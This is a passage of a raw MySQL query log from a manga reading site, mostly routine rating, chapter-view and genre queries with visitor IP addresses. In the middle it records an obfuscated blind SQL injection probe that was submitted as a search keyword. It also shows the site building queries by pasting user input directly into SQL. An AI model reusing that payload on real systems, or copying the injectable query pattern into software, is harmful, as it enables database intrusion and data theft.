ratings where manga_id = '344' order by created desc 330652861 Quit 330652862 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652862 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330652862 Quit 330652863 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652863 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330652863 Quit 330652864 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652864 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330652864 Quit 330652865 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652865 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330652865 Quit 330652866 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652866 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330652866 Quit 330652867 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652867 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330652867 Quit 330652868 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652868 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330652868 Quit 330652869 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652869 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330652869 Quit 330652870 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652870 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330652870 Quit 330652871 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652871 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330652871 Quit 330652872 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652872 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330652872 Quit 330652873 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652873 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330652873 Quit 330652874 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652874 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330652874 Quit 330652875 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652875 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330652875 Quit 330652876 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652876 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330652876 Quit 330652877 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652877 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330652877 Quit 330652878 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652878 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330652878 Quit 330652879 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652879 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330652879 Quit 330652880 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652880 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330652880 Quit 330652881 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652881 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330652881 Quit 330652882 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652882 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330652882 Quit 330652883 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652883 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330652883 Quit 330652884 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652884 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330652884 Quit 330652885 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652885 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330652885 Quit 330652886 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652886 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330652886 Quit 330652887 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652887 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330652887 Quit 330652888 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652888 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330652888 Quit 330652889 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652889 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330652889 Quit 330652890 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652890 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330652890 Quit 330652891 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652891 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330652891 Quit 330652892 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652892 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330652892 Quit 330652893 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652893 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330652893 Quit 330652894 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652894 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330652894 Quit 330652895 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652895 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330652895 Quit 330652896 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652896 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330652896 Quit 330652563 Quit 330652897 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652898 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652897 Quit 330652898 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330652898 Quit 330652899 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652900 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652899 Quit 330652900 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652900 Quit 330652901 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652902 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652901 Quit 330652902 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652902 Quit 330652903 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652904 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652903 Quit 330652904 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652904 Quit 260225 19:29:27 330652905 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652906 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652905 Quit 330652906 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '15116' 330652906 Quit 330652907 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652907 Query select * FROM chapters where id = '15116' 330652907 Quit 330652908 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652908 Query select * FROM chapters where manga_id = '299' order by id desc 330652908 Quit 330652909 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652909 Query Update chapters set view=view+1 where id = '15116' 330652909 Quit 330652910 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652910 Query select * FROM chapters where id = '15116' 330652910 Quit 330652911 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652911 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '15116' 330652911 Quit 330652912 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652912 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('299', '15116', '38.210.186.58', 'mangacherri.com', '2026-02-26 03:29:27', '2026-02-26 03:29:27') 330652912 Quit 330652913 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652913 Query select * FROM chapter_images where chapter_id = '15116' 330652913 Quit 330652914 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652914 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '299' and m.active = 1 330652914 Quit 330652915 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652915 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='299' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 260225 19:29:28 330652916 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652917 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652916 Quit 330652917 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id) group by r.manga_id) as k ORDER BY RAND() DESC limit 10 330652918 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652919 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652918 Quit 330652919 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10992' 330652919 Quit 330652920 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652920 Query select * FROM chapters where id = '10992' 330652920 Quit 330652921 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652921 Query select * FROM chapters where manga_id = '201' order by id desc 330652921 Quit 330652922 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652922 Query Update chapters set view=view+1 where id = '10992' 330652922 Quit 330652923 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652923 Query select * FROM chapters where id = '10992' 330652923 Quit 330652924 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652924 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10992' 330652924 Quit 330652925 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652925 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('201', '10992', '207.46.13.153', 'mangacherri.com', '2026-02-26 03:29:28', '2026-02-26 03:29:28') 330652925 Quit 330652926 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652926 Query select * FROM chapter_images where chapter_id = '10992' 330652926 Quit 330652927 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652927 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '201' and m.active = 1 330652927 Quit 330652928 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652928 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='201' and m.active = 1 AND (genres like '%Office%' OR genres like '%Romance%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330652929 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652930 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652929 Quit 330652930 Query INSERT INTO search_keywords (keyword, ip, created) VALUES ('1aNd//8134((sELeCT//case//8134//wHEN//8134//tHEN//1//eLse//0//end//FRoM//RdbdAtAbaSE)) OR LTBEW9XQA4', '169.150.196.30', '2026-02-26 03:29:28') 330652930 Quit 330652931 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652931 Query SELECT m.*, c.name AS latest_chapter, c.id AS latest_chapter_id FROM mangas m JOIN ( SELECT manga_id, MAX(id) AS latest_chapter_id FROM chapters GROUP BY manga_id ) lc ON lc.manga_id = m.id JOIN chapters c ON c.id = lc.latest_chapter_id WHERE ( m.title LIKE '%1aNd//8134((sELeCT//case//8134//wHEN//8134//tHEN//1//eLse//0//end//FRoM//RdbdAtAbaSE)) OR LTBEW9XQA4%' OR ( m.alternate_title IS NOT NULL AND m.alternate_title <> '' AND m.alternate_title LIKE '%1aNd//8134((sELeCT//case//8134//wHEN//8134//tHEN//1//eLse//0//end//FRoM//RdbdAtAbaSE)) OR LTBEW9XQA4%' ) ) 330652931 Quit 330652932 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652932 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = '1\'%a%N%d%/%*%*%/%8%1%3%4%=%(%\'%~%\'%|%|%(%s%E%L%e%C%T%/%*%*%/%c%a%s%e%/%*%*%/%8%1%3%4%/%*%*%/%w%H%E%N%/%*%*%/%8%1%3%4%/%*%*%/%t%H%E%N%/%*%*%/%1%/%*%*%/%e%L%s%e%/%*%*%/%0%/%*%*%/%e%n%d%/%*%*%/%F%R%o%M%/%*%*%/%R%d%b%$%d%A%t%A%b%a%S%E%)%|%|%\'%~%\'%) OR \'LTBEW9XQ\'=\'A44miwmK' 330652932 Quit 330652933 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652933 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%%') group by manga_id ORDER BY sum(view) DESC 330652933 Quit 330652934 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652935 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652934 Quit 330652935 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330652935 Quit 330652936 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652936 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330652936 Quit 330652937 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652937 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330652937 Quit 330652938 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652938 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330652938 Quit 330652939 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652939 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330652939 Quit 330652940 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652940 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330652940 Quit 330652941 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652941 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330652941 Quit 330652942 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652942 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330652942 Quit 330652943 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652943 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330652943 Quit 330652944 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652944 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330652944 Quit 330652945 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652945 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330652945 Quit 330652946 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652946 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330652946 Quit 330652947 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652947 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330652947 Quit 330652948 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652948 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330652948 Quit 330652949 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652949 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330652949 Quit 330652950 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652950 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330652950 Quit 330652951 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652951 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330652951 Quit 330652952 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652952 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330652952 Quit 330652953 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652953 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330652953 Quit 330652954 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652954 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330652954 Quit 330652955 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652955 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330652955 Quit 330652956 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652956 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330652956 Quit 330652957 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652957 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330652957 Quit 330652958 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652958 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330652958 Quit 330652959 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652959 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330652959 Quit 330652960 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652960 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330652960 Quit 330652961 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652961 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330652961 Quit 330652962 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652962 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330652962 Quit 330652963 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652963 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330652963 Quit 330652964 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652964 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330652964 Quit 330652965 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652965 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330652965 Quit 330652966 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652966 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330652966 Quit 330652967 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652967 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330652967 Quit 330652968 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652968 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330652968 Quit 330652969 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652969 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330652969 Quit 330652970 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652970 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330652970 Quit 330652971 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652971 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330652971 Quit 330652972 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652972 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330652972 Quit 330652973 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652973 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330652973 Quit 330652974 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652975 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652974 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330652974 Quit 330652976 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652975 Quit 330652977 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652976 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17113' 330652977 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330652977 Quit 330652978 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652978 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330652978 Quit 330652979 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652979 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330652979 Quit 330652976 Quit 330652980 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652981 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652980 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330652981 Query select * FROM chapters where id = '17113' 330652980 Quit 330652982 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652981 Quit 330652982 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330652983 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652982 Quit 330652983 Query select * FROM chapters where manga_id = '338' order by id desc 330652984 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652984 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330652984 Quit 330652985 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652985 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330652985 Quit 330652986 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652986 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330652986 Quit 330652987 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652987 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330652987 Quit 330652988 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652988 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330652988 Quit 330652989 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652989 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330652989 Quit 330652990 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652990 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330652990 Quit 330652991 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652991 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330652991 Quit 330652992 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652992 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330652992 Quit 330652993 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652993 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330652993 Quit 330652994 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652994 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330652994 Quit 330652995 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652995 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330652995 Quit 330652996 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652996 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330652996 Quit 330652997 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652997 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330652997 Quit 330652998 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652998 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330652998 Quit 330652999 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652999 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330652999 Quit 330653000 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653000 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330653000 Quit 330653001 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653001 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330652983 Quit 330653001 Quit 330653002 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653002 Query Update chapters set view=view+1 where id = '17113' 330653003 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653003 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330653003 Quit 330653004 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653004 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330653004 Quit 330653005 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653005 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330653005 Quit 330653002 Quit 330653006 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653007 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653007 Query select * FROM chapters where id = '17113' 330653006 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330653006 Quit 330653007 Quit 330653009 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653008 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653009 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17113' 330653008 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330653008 Quit 330653010 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653009 Quit 330653010 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330653010 